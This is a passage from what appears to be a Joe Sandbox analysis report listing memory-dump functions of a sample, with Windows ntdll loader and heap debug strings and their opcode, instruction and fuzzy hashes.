                                            • Opcode Fuzzy Hash: e05c4b993090e2eecc96529dd570ad99ee2eee289c3257c0a4bc6924857be555
                                            • Instruction Fuzzy Hash: F651EF711243469BC729DF18D848BABBBECEFD4748F140A5DB99883280E770D644CB96
                                            Function 012AAD00 Relevance: 11.8, Strings: 9, Instructions: 509COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: DLL name: %wZ$DLL search path passed in externally: %ws$LdrGetDllHandleEx$LdrpFindLoadedDllInternal$LdrpInitializeDllPath$Status: 0x%08lx$minkernel\ntdll\ldrapi.c$minkernel\ntdll\ldrfind.c$minkernel\ntdll\ldrutil.c
                                            • API String ID: 0-3197712848
                                            • Opcode ID: 46dd20ad7b7d74c44abc63e530075a90af6a1ce41fd1964f4af7799c15c6704d
                                            • Instruction ID: 0a3ded36c5db6e74bd4341d00889e5b02eaaf11793d766404d6e9068b76a53fd
                                            • Opcode Fuzzy Hash: 46dd20ad7b7d74c44abc63e530075a90af6a1ce41fd1964f4af7799c15c6704d
                                            • Instruction Fuzzy Hash: A812E1716283428BD325DF28C481BBAF7E8FF94704F84492DFA858B291E775D944CB92
                                            Function 01340274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                            • API String ID: 0-1700792311
                                            • Opcode ID: 0511a85eba32ff29b153fb02d004781b9bc310f33c3a987fdadd13cf9032c3e3
                                            • Instruction ID: bbaf0b665c2b1c5d3043fa4cf11f59698c81407e221b6f0fc242f87dca5a399c
                                            • Opcode Fuzzy Hash: 0511a85eba32ff29b153fb02d004781b9bc310f33c3a987fdadd13cf9032c3e3
                                            • Instruction Fuzzy Hash: CDD1DF31610686DFDB2AEF68C440AEDBBF5FF49718F088049F6459BA92C734A980CF54
                                            Function 013189B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON
                                            Download Yara Rule
                                            Strings
                                            • HandleTraces, xrefs: 01318C8F
                                            • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01318A67
                                            • VerifierFlags, xrefs: 01318C50
                                            • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01318A3D
                                            • AVRF: -*- final list of providers -*- , xrefs: 01318B8F
                                            • VerifierDlls, xrefs: 01318CBD
                                            • VerifierDebug, xrefs: 01318CA5
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                            • API String ID: 0-3223716464
                                            • Opcode ID: c6131d71e8c59ff5de29e04a873ab0f1cd42899675dc5d7c32a41b78178b5f85
                                            • Instruction ID: e6805654186587003e9d904db42cb1b95a0ae5048f9338e5d0c3b1cc7e0cd0ca
                                            • Opcode Fuzzy Hash: c6131d71e8c59ff5de29e04a873ab0f1cd42899675dc5d7c32a41b78178b5f85
                                            • Instruction Fuzzy Hash: D5914872641306DFE729EF6CC880B6BB7A8FB94B1CF044598FA406B258C730AC01C799
                                            Function 0129EA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                            • API String ID: 0-1109411897
                                            • Opcode ID: cdf3288be748f03a0fd3cbaa7268808e10105b87e6feb21e52d5a2fb1a1133ce
                                            • Instruction ID: e94a4a38a5e0565914cc70bdb19bc696642a71305314a102fb752005b7df62da
                                            • Opcode Fuzzy Hash: cdf3288be748f03a0fd3cbaa7268808e10105b87e6feb21e52d5a2fb1a1133ce
                                            • Instruction Fuzzy Hash: 08A23974A2566A8FDF64DF18CD887AAFBB5EF45304F1442E9DA09A7250DB709E80CF40
                                            Function 012C63FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                            • API String ID: 0-792281065
                                            • Opcode ID: 69d6b38cd89cdefad499938e46497d907702653dfe8ab552bc0429138215b78d
                                            • Instruction ID: 5faef8c5868a483e81dfc1a52c3af4addfd505e470692d914d87ef4b8ebf059a
                                            • Opcode Fuzzy Hash: 69d6b38cd89cdefad499938e46497d907702653dfe8ab552bc0429138215b78d
                                            • Instruction Fuzzy Hash: EE91F470B20316DBEB3A9F58D955BAEBBE9EB50B18F14012CEB006B7C1D7B09941C791
                                            Function 0128645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON
                                            Download Yara Rule
                                            Strings
                                            • Getting the shim engine exports failed with status 0x%08lx, xrefs: 012E9A01
                                            • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 012E9A2A
                                            • apphelp.dll, xrefs: 01286496
                                            • LdrpInitShimEngine, xrefs: 012E99F4, 012E9A07, 012E9A30
                                            • minkernel\ntdll\ldrinit.c, xrefs: 012E9A11, 012E9A3A
                                            • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 012E99ED
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                            • API String ID: 0-204845295
                                            • Opcode ID: fbcab64f2544538e63d790d5bfd56c6877a4cbaff67fd390b0ad72387338fbae
                                            • Instruction ID: e798344195f60692ed331a9ed32128667668a97fa08bceb6e8d48dc9ece8f8a4
                                            • Opcode Fuzzy Hash: fbcab64f2544538e63d790d5bfd56c6877a4cbaff67fd390b0ad72387338fbae
                                            • Instruction Fuzzy Hash: B951C3712793059FEB21EF24D845BAB77E8FF84748F40091EF585972A0D670E944CB92
                                            Function 012C2674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                            Download Yara Rule
                                            Strings
                                            • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01302178
                                            • SXS: %s() passed the empty activation context, xrefs: 01302165
                                            • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01302180
                                            • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 013021BF
                                            • RtlGetAssemblyStorageRoot, xrefs: 01302160, 0130219A, 013021BA
                                            • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0130219F
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                            • API String ID: 0-861424205
                                            • Opcode ID: a5ab68d0d8470e19d5b6b630f5623d6f807c9853c1344170d6dd3bcbb40a3922
                                            • Instruction ID: 47adeec27b5e3bd599d445783729b85fa95a088c120bb45335cb3b626b71ee0a
                                            • Opcode Fuzzy Hash: a5ab68d0d8470e19d5b6b630f5623d6f807c9853c1344170d6dd3bcbb40a3922
                                            • Instruction Fuzzy Hash: 03314B3AF50225F7F7268A99CC99F6B7BB8DB54E44F05016DFB04A7180D6709A01C7A0
                                            Function 012CC6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                            Download Yara Rule
                                            Strings
                                            • LdrpInitializeProcess, xrefs: 012CC6C4
                                            • minkernel\ntdll\ldrinit.c, xrefs: 012CC6C3
                                            • minkernel\ntdll\ldrredirect.c, xrefs: 01308181, 013081F5
                                            • LdrpInitializeImportRedirection, xrefs: 01308177, 013081EB
                                            • Unable to build import redirection Table, Status = 0x%x, xrefs: 013081E5
                                            • Loading import redirection DLL: '%wZ', xrefs: 01308170
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                            • API String ID: 0-475462383
                                            • Opcode ID: 34341a7c446863a6efd6e3f97f257b986e322b9966ae85cd1429acf33ae3200a
                                            • Instruction ID: 28285615fbf423a014fbf0c789648c7c38632ebd71f8c6da68e8968a303e8b46
                                            • Opcode Fuzzy Hash: 34341a7c446863a6efd6e3f97f257b986e322b9966ae85cd1429acf33ae3200a
                                            • Instruction Fuzzy Hash: 1431F3717643429FD224EF2DE956E2B77D8EF94B18F00065CF944AB291E620EC04C7A2
                                            Function 012D096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 012D2DF0: LdrInitializeThunk.NTDLL ref: 012D2DFA
                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 012D0BA3
                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 012D0BB6
                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 012D0D60
                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 012D0D74
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                            • String ID:
                                            • API String ID: 1404860816-0
                                            • Opcode ID: 10914ebb7eb1d55ae0e3c4924ae24b19fde67addc3b0fdc18989a98065de1db4
                                            • Instruction ID: 37edebe61a6b459466235441679eb29b4a87d28cbd4c310e98bf7596093fa6fa
                                            • Opcode Fuzzy Hash: 10914ebb7eb1d55ae0e3c4924ae24b19fde67addc3b0fdc18989a98065de1db4
                                            • Instruction Fuzzy Hash: 34427E71910715DFDB21CF28C891BAAB7F4FF04314F1485A9E989DB292D770AA84CF60
                                            Function 0129A3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                            • API String ID: 0-379654539
                                            • Opcode ID: 069f85cdd35210843a5ad90a3ccda124b36357930fb01b7681df0301a6078e44
                                            • Instruction ID: 25bcb53a5bd35c10b9d7a375e5394798345f63b77218f2d701e3fdd6dcc561cc
                                            • Opcode Fuzzy Hash: 069f85cdd35210843a5ad90a3ccda124b36357930fb01b7681df0301a6078e44
                                            • Instruction Fuzzy Hash: 29C15774628382CFDB21CF5CC144B6AB7E4FB85704F04896AFA958B291E774C949CB92
                                            Function 012C8402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                            Download Yara Rule
                                            Strings
                                            • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 012C855E
                                            • LdrpInitializeProcess, xrefs: 012C8422
                                            • @, xrefs: 012C8591
                                            • minkernel\ntdll\ldrinit.c, xrefs: 012C8421
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                            • API String ID: 0-1918872054
                                            • Opcode ID: f13a1ea6f74f2909ba85bb450cf2f920be5f5f2d459db6bedb2ad4089a5ead27
                                            • Instruction ID: ea64372a582d2acd800643e8de7399940ab3d2295a4193ca41fdf8a94f2bb41b
                                            • Opcode Fuzzy Hash: f13a1ea6f74f2909ba85bb450cf2f920be5f5f2d459db6bedb2ad4089a5ead27
                                            • Instruction Fuzzy Hash: 5C916A71568345AFD722DB25C841FBBBAECEB94B84F404A2EFA8492151E370D944CB62
                                            Function 012C273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                            Download Yara Rule
                                            Strings
                                            • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 013021D9, 013022B1
                                            • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 013022B6
                                            • SXS: %s() passed the empty activation context, xrefs: 013021DE
                                            • .Local, xrefs: 012C28D8
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                            • API String ID: 0-1239276146
                                            • Opcode ID: 8cfa51c8c65ace5889461db0236bd709d56218aa0c5453506f54cde8618a2b7b
                                            • Instruction ID: ecf5e08e9937356e1b65f78278ac38f4991bb7513137ba3b23d82e8af9f8e7d2
                                            • Opcode Fuzzy Hash: 8cfa51c8c65ace5889461db0236bd709d56218aa0c5453506f54cde8618a2b7b
                                            • Instruction Fuzzy Hash: 6DA1B43191022ADBDB25CF58CC88BE9B7B5BF58714F2542EDDA08A7251DB709E80CF90
                                            Function 012C4AD0 Relevance: 5.2, Strings: 4, Instructions: 228COMMON
                                            Download Yara Rule
                                            Strings
                                            • SXS: %s() called with invalid flags 0x%08lx, xrefs: 0130342A
                                            • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01303437
                                            • RtlDeactivateActivationContext, xrefs: 01303425, 01303432, 01303451
                                            • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01303456
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                            • API String ID: 0-1245972979
                                            • Opcode ID: 3bd6eff04d05e2e3062df7425bc84a5ae4b1424fae929adb7c44b1f9685436b5
                                            • Instruction ID: f43b9f2366ad0bfa730ce33c78bb271c29058ff2646ae8417b6f0e3b7d7179f7
                                            • Opcode Fuzzy Hash: 3bd6eff04d05e2e3062df7425bc84a5ae4b1424fae929adb7c44b1f9685436b5
                                            • Instruction Fuzzy Hash: 656110366206529FD7239F1CC8A1B2BB7E5BF80B14F15862DEA55AF290D730E8018B91
                                            Function 012964AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                            Download Yara Rule
                                            Strings
                                            • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 012F1028
                                            • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 012F106B
                                            • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 012F0FE5
                                            • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 012F10AE
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                            • API String ID: 0-1468400865
                                            • Opcode ID: 786dc3ed1d2343adf7cca570e07d3b424c5c3c24db804eae5de5ef4c816e0f62
                                            • Instruction ID: f8e821c2e2a3a66e970db30cdf92b88b91a42eb9150e4f7d0de95c190cfeeacc
                                            • Opcode Fuzzy Hash: 786dc3ed1d2343adf7cca570e07d3b424c5c3c24db804eae5de5ef4c816e0f62
                                            • Instruction Fuzzy Hash: A671F2B19243069FCB20EF18D885FAB7FE8AF55764F404468FA488B286D774D588CBD1
                                            Function 012C4D1D Relevance: 5.1, Strings: 4, Instructions: 117COMMON
                                            Download Yara Rule
                                            Strings
                                            • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 0130362F
                                            • LdrpFindDllActivationContext, xrefs: 01303636, 01303662
                                            • minkernel\ntdll\ldrsnap.c, xrefs: 01303640, 0130366C
                                            • Querying the active activation context failed with status 0x%08lx, xrefs: 0130365C
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                            • API String ID: 0-3779518884
                                            • Opcode ID: 75bb0c429e34f9235cbd0cdcdd2dd13b0d10fcc4eff44f631a5b6e2bef5f7fdd
                                            • Instruction ID: 84e7a80a73a13aaf7b61c7954f10118daf81523d04ceebc01eb3ee7463a98540
                                            • Opcode Fuzzy Hash: 75bb0c429e34f9235cbd0cdcdd2dd13b0d10fcc4eff44f631a5b6e2bef5f7fdd
                                            • Instruction Fuzzy Hash: EE31FA629206939EDF36BB0CC869B2B76A8BB01F54F06436DEB0457155D7A09C80C795
                                            Function 012B245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON
                                            Download Yara Rule
                                            Strings
                                            • apphelp.dll, xrefs: 012B2462
                                            • LdrpDynamicShimModule, xrefs: 012FA998
                                            • minkernel\ntdll\ldrinit.c, xrefs: 012FA9A2
                                            • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 012FA992
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                            • API String ID: 0-176724104
                                            • Opcode ID: 5951522f481586a80f5813b1b2948026fc77734d2d33687e25e856d7b5515c07
                                            • Instruction ID: a5ab56f6579128f449fe619d7e204a306d96e895d896edbb762ad5ba920206de
                                            • Opcode Fuzzy Hash: 5951522f481586a80f5813b1b2948026fc77734d2d33687e25e856d7b5515c07
                                            • Instruction Fuzzy Hash: 9F312775630302EBDB319F5DC881AAEBBB8FB84B04F16002DEA046B355D7B0A945C780
                                            Function 012A29A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON
                                            Download Yara Rule
                                            Strings
                                            • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 012A327D
                                            • HEAP: , xrefs: 012A3264
                                            • HEAP[%wZ]: , xrefs: 012A3255
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                            • API String ID: 0-617086771
                                            • Opcode ID: 11a05eae6e08dfc4c3337a2887ac43c61923c567b93eea7ddfef0bba695381fb
                                            • Instruction ID: aa9372b35f9502a2cc63ddb163b5cee694e448381f840ab6517e60f65e70f92a
                                            • Opcode Fuzzy Hash: 11a05eae6e08dfc4c3337a2887ac43c61923c567b93eea7ddfef0bba695381fb
                                            • Instruction Fuzzy Hash: 8592CD71A2424ADFDB25CF68C4407AEBBF1FF08300F588499EA49AB392D774A945CF50
                                            Function 012A0770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                            • API String ID: 0-4253913091
                                            • Opcode ID: b3904007fb0292b20d26e48e9fffe40828987c87f36cf7d68f06ffee82316fbb
                                            • Instruction ID: 3982824d4b8ae3111b57ae667feac23a0e7aed99c99f90e8e9a376755340b832
                                            • Opcode Fuzzy Hash: b3904007fb0292b20d26e48e9fffe40828987c87f36cf7d68f06ffee82316fbb
                                            • Instruction Fuzzy Hash: 92F1DF70A20606DFEB25CF68C894F6ABBF5FF44704F148268E6069B391D774E981CB94
                                            Function 012B6962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID: $@
                                            • API String ID: 2994545307-1077428164
                                            • Opcode ID: 6fe40212318ad77d59bf38b6ca82ee68bc3b1c9efee707da5942c383122a5f0d
                                            • Instruction ID: 11c70bf0a73b098355ffc55ff85fc4d4fcdf6e3f8cf7a0138be16cf2f629746d
                                            • Opcode Fuzzy Hash: 6fe40212318ad77d59bf38b6ca82ee68bc3b1c9efee707da5942c383122a5f0d
                                            • Instruction Fuzzy Hash: C7C280716283469FD725CF28C881BABBBE5AFC8754F04892DFA89C7281D774D844CB52
                                            Function 0128A197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: FilterFullPath$UseFilter$\??\
                                            • API String ID: 0-2779062949
                                            • Opcode ID: 99dcaa03d9a2597709a206769e774590713e41784f7692906fcc5efb45e1482a
                                            • Instruction ID: 15305bb66e3b8f67af81d02ca3cc9d5ac093bb7155714a3d061466bf1902663e
                                            • Opcode Fuzzy Hash: 99dcaa03d9a2597709a206769e774590713e41784f7692906fcc5efb45e1482a
                                            • Instruction Fuzzy Hash: 2AA1617192122A9BDB31DF68CC88BEAB7B8FF44710F1001EADA09A7250D7759E84CF50
                                            Function 012B0BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON
                                            Download Yara Rule
                                            Strings
                                            • minkernel\ntdll\ldrinit.c, xrefs: 012FA121
                                            • LdrpCheckModule, xrefs: 012FA117
                                            • Failed to allocated memory for shimmed module list, xrefs: 012FA10F
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                            • API String ID: 0-161242083
                                            • Opcode ID: 64232000f48cc98088b5a6b083adf88a9e0ff30b4e02d60fd8d53951d52b7534
                                            • Instruction ID: aaeaeb4fe3122928ba2fba789fb0a66d65c2abf18e3b8283011710f66f88d6cb
                                            • Opcode Fuzzy Hash: 64232000f48cc98088b5a6b083adf88a9e0ff30b4e02d60fd8d53951d52b7534
                                            • Instruction Fuzzy Hash: D971AD70A20306DFDB26DF68C981BBEB7F8FB44744F15402DEA06AB251E774A941CB54
                                            Function 012A0A5B Relevance: 3.9, Strings: 3, Instructions: 190COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                            • API String ID: 0-1334570610
                                            • Opcode ID: b7f2ffa480c78cb25ebd01304f10b21a8f622f8006285ad30d5abac827ec9f57
                                            • Instruction ID: fdbd76e1c307b7be95fb262d5057778932153573d0d320f31a1d787cde44f708
                                            • Opcode Fuzzy Hash: b7f2ffa480c78cb25ebd01304f10b21a8f622f8006285ad30d5abac827ec9f57
                                            • Instruction Fuzzy Hash: CA61F370620302DFDB29CF28C541B6ABBE1FF44704F54896DEA468F292D7B0E881CB95
                                            Function 012CC720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON
                                            Download Yara Rule
                                            Strings
                                            • minkernel\ntdll\ldrinit.c, xrefs: 013082E8
                                            • Failed to reallocate the system dirs string !, xrefs: 013082D7
                                            • LdrpInitializePerUserWindowsDirectory, xrefs: 013082DE
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
